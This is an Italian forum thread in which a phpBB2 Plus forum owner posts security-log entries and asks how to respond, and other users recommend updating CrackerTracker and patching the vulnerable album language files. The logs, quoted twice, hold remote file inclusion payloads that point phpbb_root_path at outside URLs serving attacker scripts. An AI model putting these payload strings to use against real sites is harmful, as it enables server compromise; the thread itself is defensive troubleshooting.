Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Coding e Sistemistica
    4. CMS & Piattaforme Self-Hosted
    5. Log strani... Attacchi hacker?
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • R
      robert13 User • ultima modifica di

      Log strani... Attacchi hacker?

      Salve a tutti.
      Ho CrackerTracker ed un forum phpbb2 e noto che da qualche tempo il CrackerTracker mi segnala diversi logfile di attacco e l'ip degli autori...

      Ora mi chiedo: come devo reagire???

      Gli attacchi sono:

      pic_id=17//language/lang_english/lang_main_album.php?phpbb_root_path=http://futurehousingsystems.com/images/control.txt?

      cat_id-1&user_id=5/language/lang_english/lang_main_album.php?phpbb_root_path=http://web2.0sites.com/wp-content/uploads/2006/10/prs.txt?

      sid=5fd2be95a589035a32459630b6a07b75//language/lang_english/lang_main_album.php?phpbb_root_path=%22Poweredhttp://www.palmer-werbeart.de//components/scan.txt?

      phpbb_root_path=http://www.sexofv.com/galerias/rubias/monica-1/full/prs.txt?

      Questi sono solo alcuni....

      Datemi un parere...:fumato:

      0 Miglior Risposta Ringrazia Cita Rispondi

        1 Risposta Ultima Risposta
      • P
        paolino Moderatore • ultima modifica di

        i log indicano chiaramente tentativi di sfruttare vulnerabilità di PhpBB

        gli IP sono ovviamente di proxy, magari usano una botnet, quindi è inutile pensare di poter risalire agli aggressori

        l'unica cosa da fare è mantenere aggiornato PhpBB e verificare sul loro forum eventuali avvisi di sicurezza

        se aggiorni il CMS è difficile che possano crearti problemi

        0 Miglior Risposta Ringrazia Cita Rispondi

          1 Risposta Ultima Risposta
        • C
          carlitosway Consiglio Direttivo • ultima modifica di

          Ciao robert13, sposto la discussione in PhpBB, dove potrai avere più pareri 🙂

          0 Miglior Risposta Ringrazia Cita Rispondi

            1 Risposta Ultima Risposta
          • M
            master1986 User Attivo • ultima modifica di

            @robert13 said:

            Salve a tutti.
            Ho CrackerTracker ed un forum phpbb2 e noto che da qualche tempo il CrackerTracker mi segnala diversi logfile di attacco e l'ip degli autori...

            Ora mi chiedo: come devo reagire???

            Gli attacchi sono:

            pic_id=17//language/lang_english/lang_main_album.php?phpbb_root_path=http://futurehousingsystems.com/images/control.txt?

            cat_id-1&user_id=5/language/lang_english/lang_main_album.php?phpbb_root_path=http://web2.0sites.com/wp-content/uploads/2006/10/prs.txt?

            sid=5fd2be95a589035a32459630b6a07b75//language/lang_english/lang_main_album.php?phpbb_root_path=%22Poweredhttp://www.palmer-werbeart.de//components/scan.txt?

            phpbb_root_path=http://www.sexofv.com/galerias/rubias/monica-1/full/prs.txt?

            Questi sono solo alcuni....

            Datemi un parere...:fumato:

            Alcuni di questi colpiscono le vulnerabilità in phpbbplus 1.53 sehai effettuato il fix come detto su http://www.phpbb2.de non dovresti avere problemi!

            PS: Aggiorna il ctracker alla versione 5.0.4!!!!!!

            0 Miglior Risposta Ringrazia Cita Rispondi

              1 Risposta Ultima Risposta
            • J
              jantima User Attivo • ultima modifica di

              ciao robert13, assicurati di aver letto gli articoli nella prima pagina di questa sezione del forum, e assicurati di aver installato i fix per i recenti bug scoperti che hanno causato molti attacchi anche ad altra gente.

              0 Miglior Risposta Ringrazia Cita Rispondi

                1 Risposta Ultima Risposta
              • M
                master1986 User Attivo • ultima modifica di

                @Jantima said:

                ciao robert13, assicurati di aver letto gli articoli nella prima pagina di questa sezione del forum, e assicurati di aver installato i fix per i recenti bug scoperti che hanno causato molti attacchi anche ad altra gente.

                😉 Inoltre la miglior cosa è procedere all'interno della Plus all'installazione (aggiornamento) di Ctraker alla versione 5.0.4, in Phpbbplus è presente la 2.0 :rollo:

                0 Miglior Risposta Ringrazia Cita Rispondi

                  1 Risposta Ultima Risposta
                • R
                  robert13 User • ultima modifica di

                  Ho la 4.1.7 ma è un lavoraccio aggiornarla alla 5.0.4

                  Cosa rischio se un attacco di questo va a buon fine?

                  0 Miglior Risposta Ringrazia Cita Rispondi

                    1 Risposta Ultima Risposta
                  • R
                    robert13 User • ultima modifica di

                    ho la 4.17

                    0 Miglior Risposta Ringrazia Cita Rispondi

                      1 Risposta Ultima Risposta
                    • M
                      master1986 User Attivo • ultima modifica di

                      Ascolta ma hai PhpbbPlus?

                      O utilizzi Phpbb2 normale?

                      Altra cosa hai il Photo Album di Smartor?

                      0 Miglior Risposta Ringrazia Cita Rispondi

                        1 Risposta Ultima Risposta
                      • R
                        robert13 User • ultima modifica di

                        ho phpbb2 plus 153 ...

                        non ho pulsanti per l'aggiornamento automatico, quindi dovrei rimuovere l'attuale cracker e installare il nuovo...

                        o c'è altro che non so?

                        GRAZIE A TUTTI.

                        0 Miglior Risposta Ringrazia Cita Rispondi

                          1 Risposta Ultima Risposta
                        • M
                          master1986 User Attivo • ultima modifica di

                          Stai attento, se hai phpbbplus 1.53 assicurati di aver fixato i bug presenti nei file language che sono vulnerabili!

                          0 Miglior Risposta Ringrazia Cita Rispondi

                            1 Risposta Ultima Risposta
                          • R
                            robert13 User • ultima modifica di

                            Non l'ho fatto... Dove li trovo???

                            è una domanda un po stupida, ma ho cercato già nel sito tedesco, ma non capisco un granche...

                            0 Miglior Risposta Ringrazia Cita Rispondi

                              1 Risposta Ultima Risposta
                            • R
                              robert13 User • ultima modifica di

                              Ho trovato nel gt forum, ed ho corretto i lang_mine_album e lang_admin_album per ogni lingua.

                              Questo mi basta?

                              0 Miglior Risposta Ringrazia Cita Rispondi

                                1 Risposta Ultima Risposta
                              • M
                                master1986 User Attivo • ultima modifica di

                                @robert13 said:

                                Ho trovato nel gt forum, ed ho corretto i lang_mine_album e lang_admin_album per ogni lingua.

                                Questo mi basta?

                                Perfetto 😉

                                Fai anche questa modifica

                                http://www.giorgiotave.it/forum/phpbb/52911-urgente-fix-links-mod-phpbbplus-e-vulnerabile.html

                                Ora stai + tranquillo in questo ambito 😉

                                0 Miglior Risposta Ringrazia Cita Rispondi

                                  1 Risposta Ultima Risposta
                                • R
                                  robert13 User • ultima modifica di

                                  Grazie,
                                  ho trovato risposte più esaurienti qui che che sul forum phpbb.it

                                  Ciao a tutti e grazie a master1986

                                  0 Miglior Risposta Ringrazia Cita Rispondi

                                    1 Risposta Ultima Risposta
                                  • R
                                    robert13 User • ultima modifica di

                                    Scusate se riapro, ma la fix:

                                    http://www.giorgiotave.it/forum/phpbb/52749-urgente-falla-di-sicurezza-phpbbplus-1-53-fix-immediato-leggete.html

                                    che ho inserito mi da errore di sintassi:

                                    ***/**************************************************  *************************
                                     *    lang_main_album.php [Italian]
                                     *    -------------------
                                     *     begin              : Sunday, February 02, 2003
                                     *     copyright          : (C) 2003 Smartor
                                     *     email              : [EMAIL="[email protected]"][email protected][/EMAIL]
                                     *
                                     *     $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $
                                     *     translation      : Antonio Mercurio ([email protected]) [www.phpbbplus.it](http://www.phpbbplus.it/)
                                     **************************************************  **************************/*
                                          **if ( !defined('IN_PHPBB') ) 
                                    { 
                                       die('Hacking attempt'); 
                                       exit; ***/**************************************************  *************************
                                     *
                                     * This program is free software;you can redistribute it *and*/*or* modify
                                     * it under the terms of the GNU General Public License *as* published by
                                     * the Free Software Foundation;either version 2 of the License, *or*
                                     * (at your option) any later version.
                                     *
                                     **************************************************  *************************/*
                                     *//--- Album Category Hierarchy : begin*
                                    *//--- version : 1.10*
                                    *include*($phpbb_root_path.'language/lang_italian/lang_hierarchy_album.' . $phpEx);
                                    *//--- Album Category Hierarchy : end***
                                    ```Ho sbagliato in qualcosa?
                                    0 Miglior Risposta Ringrazia Cita Rispondi

                                      1 Risposta Ultima Risposta
                                    • M
                                      master1986 User Attivo • ultima modifica di

                                      Certo ci sono delle stringhe sbagliate

                                      guarda:

                                      *** * $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $

                                      • translation      : Antonio Mercurio ([email protected]) [www.phpbbplus.it](http://www.phpbbplus.it/)
                                        

                                      ************************************************** /
                                      if ( !defined('IN_PHPBB') )
                                      {
                                      die('Hacking attempt');
                                      exit; /
                                      ******************** *************************
                                      *

                                      • This program is free software;you can redistribute it and/or modify
                                      • it under the terms of the GNU General Public License as published by
                                      • the Free Software Foundation;either version 2 of the License, or
                                      • (at your option) any later version.

                                      ************************************************** **********************/

                                      Devi modificarlo così:

                                      <?php
                                      /***************************************************************************

                                      • lang_main_album.php [Italian]

                                      • begin              : Sunday, February 02, 2003
                                        
                                      • copyright          : (C) 2003 Smartor
                                        
                                      • email              : [email protected]
                                        
                                      • $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $
                                        
                                      • translation      : Antonio Mercurio ([email protected]) www.phpbbplus.it
                                        

                                      */
                                      /

                                      *

                                      • This program is free software;you can redistribute it and/or modify
                                      • it under the terms of the GNU General Public License as published by
                                      • the Free Software Foundation;either version 2 of the License, or
                                      • (at your option) any later version.

                                      ***************************************************************************/
                                      if ( !defined('IN_PHPBB') )
                                      {
                                      die('Hacking attempt');
                                      exit;
                                      }

                                      //--- Album Category Hierarchy : begin
                                      //--- version : 1.10
                                      include($phpbb_root_path.'language/lang_italian/lang_hierarchy_album.' . $phpEx);
                                      //--- Album Category Hierarchy : end

                                      0 Miglior Risposta Ringrazia Cita Rispondi

                                        1 Risposta Ultima Risposta
                                      • R
                                        robert13 User • ultima modifica di

                                        Provo, grazie.

                                        0 Miglior Risposta Ringrazia Cita Rispondi

                                          1 Risposta Ultima Risposta
                                        • R
                                          robert13 User • ultima modifica di

                                          Ok...

                                          Riapro questo argomento per segnalare il link da qui è possibile aggiornare il ctracker alla versione 5.0.4 (tramite installazione, durata 2 minuti, senza l'infinita modifica file...)

                                          Attenzione: l'aggiornamento è solo per la versione di ctracker di phpbb2 plus 153a .

                                          link:http://www.phpbb2.de/dload.php?action=file&file_id=834

                                          al 63 esimo attacco in un mese 😮 ho aggiornato... non si sa mai...

                                          Saluto tutti:fumato:

                                          0 Miglior Risposta Ringrazia Cita Rispondi

                                            1 Risposta Ultima Risposta
                                          Caricamento altri post
                                          Rispondi
                                          • Topic risposta
                                          Effettua l'accesso per rispondere
                                          • Da Vecchi a Nuovi
                                          • Da Nuovi a Vecchi
                                          • Più Voti